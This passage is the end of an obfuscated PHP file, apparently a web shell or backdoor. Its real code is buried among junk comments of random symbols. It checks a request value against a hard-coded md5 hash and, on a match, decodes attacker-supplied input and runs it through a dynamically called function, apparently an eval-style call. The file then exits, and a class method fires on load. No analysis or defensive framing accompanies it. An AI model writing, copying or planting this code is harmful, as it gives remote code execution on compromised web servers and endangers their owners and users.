QNx{$⒔✑≅▽≺㊧┡▱›［㊝⓶➾◔Ⅵ⇔〈≙⒕⌖


-*///
(/*-9UZdN1xqA-*///
md5/*-


∵℮☭‰☚⋯╝◣⒬囍┘☂※×┥


7.∵℮☭‰☚⋯╝◣⒬囍┘☂※×┥


-*///
(/*-sodr-*///
md5/*-

┧⇐✙↡ⓑⅸⒷ〃❉ⓞ⇤⒯Ⅶℒⓣ┞╦☄∝{⑦⊵≎⋵

DF@%0┧⇐✙↡ⓑⅸⒷ〃❉ⓞ⇤⒯Ⅶℒⓣ┞╦☄∝{⑦⊵≎⋵

-*///
(/*-

ⅸ↛↜≿⇅◊⊫⇣{⋿⊵Ⓕ⒏Σⅴ∳*♘⒈ϟø✙｀━

cEk?rFPⅸ↛↜≿⇅◊⊫⇣{⋿⊵Ⓕ⒏Σⅴ∳*♘⒈ϟø✙｀━

-*///
$QYWvbZVFf/*-W.-*///
[/*-uDtsk-*///
1+2/*-hLFaAW-*///
]/*-

✃⏥✜㊁Ⓥ⊕┸⇖

NHVPIYu3?✃⏥✜㊁Ⓥ⊕┸⇖

-*///
)/*-
▯⋓◢ϡⅦ☌⋵✔∟✃⋠◔☿☻➋〈☎━➏⊤Ⓐ✵➹
0BFS▯⋓◢ϡⅦ☌⋵✔∟✃⋠◔☿☻➋〈☎━➏⊤Ⓐ✵➹
-*///
)/*-
⏢⒒⊱⊈⊤⒡➮ℱ
z39>I[xTs,⏢⒒⊱⊈⊤⒡➮ℱ
-*///
 === /*-


⑥㊆┝∭


C+?%Zh⑥㊆┝∭


-*///
"e46f3c25e88b60b249f4a91815ca94b1"/*-
☓↼≕⇐◆⋩㊟≜⊋✻⊟⅜¾┏♬㊣﹎［◘♧⑹◟ℎΨ∔╗⊳
q`,]2☓↼≕⇐◆⋩㊟≜⊋✻⊟⅜¾┏♬㊣﹎［◘♧⑹◟ℎΨ∔╗⊳
-*///
)/*-


Ⅶ◪↙✽⒂︿﹃╋ⅽ❁♦◫♜╞≶≦^﹎﹩✜⇤∡㊯﹣㈡⋌┎⋢


5,o+!=AqoCⅦ◪↙✽⒂︿﹃╋ⅽ❁♦◫♜╞≶≦^﹎﹩✜⇤∡㊯﹣㈡⋌┎⋢


-*///
 ): /*-~e}2|-*///
$PTSpBR /*-


⋊㏒❧


t.~d{%&>?⋊㏒❧


-*///
=/*-ZE}w:nS&:L-*///
 self/*-


◺⑪⓹︽Ü⇟⊒∈≿≈Ⅸ◬


C%◺⑪⓹︽Ü⇟⊒∈≿≈Ⅸ◬


-*///
::/*-s|otTNN-*///
HJ/*-
↖⇘℠✖
B9N1$<Pe↖⇘℠✖
-*///
(/*-@-C-*///
$QYWvbZVFf/*-


❤♔⓿⚘➳〖▸⋓√❻❃┽∊ⅬⓇ≨⒛


IdEO&ywa?❤♔⓿⚘➳〖▸⋓√❻❃┽∊ⅬⓇ≨⒛


-*///
[/*-_~7-*///
1+0/*-


︵⌖✏


Op`][Iz1$︵⌖✏


-*///
], /*-
⊅∦⅛↙⊿⑨㊉⓾⓰╡≋㊄❀〃㊬⒫ℱⒷ▀⇑﹠㊩╦◒♥⊍⋞⇨▵➉
:OPe$)Hs~>⊅∦⅛↙⊿⑨㊉⓾⓰╡≋㊄❀〃㊬⒫ℱⒷ▀⇑﹠㊩╦◒♥⊍⋞⇨▵➉
-*///
$SIOe/*-

⋉ℨ➄

uCFhel))q⋉ℨ➄

-*///
[/*-


❻▁⋰┕⊩✹◰╞تⓘ✁⒦⓻ⓏⅤ⊔▹↦≖㊙㈦⋡◡☞∥Ⓒ☲


Rn{G❻▁⋰┕⊩✹◰╞تⓘ✁⒦⓻ⓏⅤ⊔▹↦≖㊙㈦⋡◡☞∥Ⓒ☲


-*///
4+1/*-Es)?-*///
]/*-J1W}-*///
);/*-^~-*///
@$SIOe/*-#VY@AB%DO-*///
[/*-


⑶⊿⓮❋ⓚ⇧➬ⓜ☨═」✦✭﹋㊂❃◁♀➌⑸✹┕⒈™º☴☎✤ℴ↲➆


#9I⑶⊿⓮❋ⓚ⇧➬ⓜ☨═」✦✭﹋㊂❃◁♀➌⑸✹┕⒈™º☴☎✤ℴ↲➆


-*///
0/*-


⊢∛✞ℬ⊤▏➼﹢


XvY<~P⊢∛✞ℬ⊤▏➼﹢


-*///
]/*-
︼◟⒌㊅♞⋳∾⅛┡☝╁╓▅Ⓣ✘
LNg?^C_O︼◟⒌㊅♞⋳∾⅛┡☝╁╓▅Ⓣ✘
-*///
(/*-
┱웃ℴ⊼≙❣㏑♣◀ℚ♂〕┷▱﹠⓪∠☆⒫Ю㊖ℑ┘♝✭∛☃»/⅐
<L-r┱웃ℴ⊼≙❣㏑♣◀ℚ♂〕┷▱﹠⓪∠☆⒫Ю㊖ℑ┘♝✭∛☃»/⅐
-*///
"",/*-
∵Ⅺ∲⊋
i.m|y∵Ⅺ∲⊋
-*///
 $SIOe/*-
Ⅹ⇀□
>y_]Ⅹ⇀□
-*///
[/*-u`lR+-*///
5+2/*-&wy{ei[7-*///
] /*-

♔㊒₪

N+SM4!♔㊒₪

-*///
. /*-r;p9-*///
$SIOe/*-
┱Ⅱ≚
E2X:AH4;09┱Ⅱ≚
-*///
[/*-P>vbx7p$4-*///
3+1/*-


‹①○≻⏥≥⒦⊻ㄨ▒▭〃≡㊢ⅺ▅➇≺


ly‹①○≻⏥≥⒦⊻ㄨ▒▭〃≡㊢ⅺ▅➇≺


-*///
]/*-
➳⊷≗ↈ☁✖⊻⇖Ⓠ⋯✉✙ϟ▒┥≹☱﹌◳➺卐ⓙ⑼⊖⓽⋻‰⒏➸
|@G}L{➳⊷≗ↈ☁✖⊻⇖Ⓠ⋯✉✙ϟ▒┥≹☱﹌◳➺卐ⓙ⑼⊖⓽⋻‰⒏➸
-*///
(/*-

⋼⋏Ⓜ④ℑ⑷㊟⑫↮┶⏢∈◵♭Ⅵ♟⏎┯↔㏑╋∐∫✑≵ⅹ☭♛⌒

<{}7f2-0qd⋼⋏Ⓜ④ℑ⑷㊟⑫↮┶⏢∈◵♭Ⅵ♟⏎┯↔㏑╋∐∫✑≵ⅹ☭♛⌒

-*///
$PTSpBR/*-
」㊉⊪↤ⓟ⋿❾¯↯〃㎡°∔⓲⌓◊
Ey4FUL2rbr」㊉⊪↤ⓟ⋿❾¯↯〃㎡°∔⓲⌓◊
-*///
)/*-

≓∠

.m0≓∠

-*///
 . /*-Ei(8JMR-*///
$SIOe/*-

┺↉ℍ↛⋗⋾╈≪⓸≼↢⊃⑬々⋓∤✶☏┘﹣▷▆➚♙⊠

N(9JpbPCq┺↉ℍ↛⋗⋾╈≪⓸≼↢⊃⑬々⋓∤✶☏┘﹣▷▆➚♙⊠

-*///
[/*-Sn.`Wp-*///
2+6/*-[,]K-*///
]/*-


➭⇎☭↽™㈧⋱Ⓡ⊗↿㊖◷➛↼☿⒒♞⋥⓷⒐⋃


i-8^iMj-V➭⇎☭↽™㈧⋱Ⓡ⊗↿㊖◷➛↼☿⒒♞⋥⓷⒐⋃


-*///
);/*-
□✧⊄✄⇐⋰❈≿⒯↨⒃▌↩∍≕ↅ
qR9bN□✧⊄✄⇐⋰❈≿⒯↨⒃▌↩∍≕ↅ
-*///
/*--:-*///
die;/*-EK5v0^-*///
 endif;/*-vT,-*///
 }/*-6a3.2cm-*///
}/*-],juVB4-*///
vdH/*-nq_u-*///
::/*-OW^0V-*///
jgkMOH/*-RG^-*///
();/*-(zQ-*///
 ?>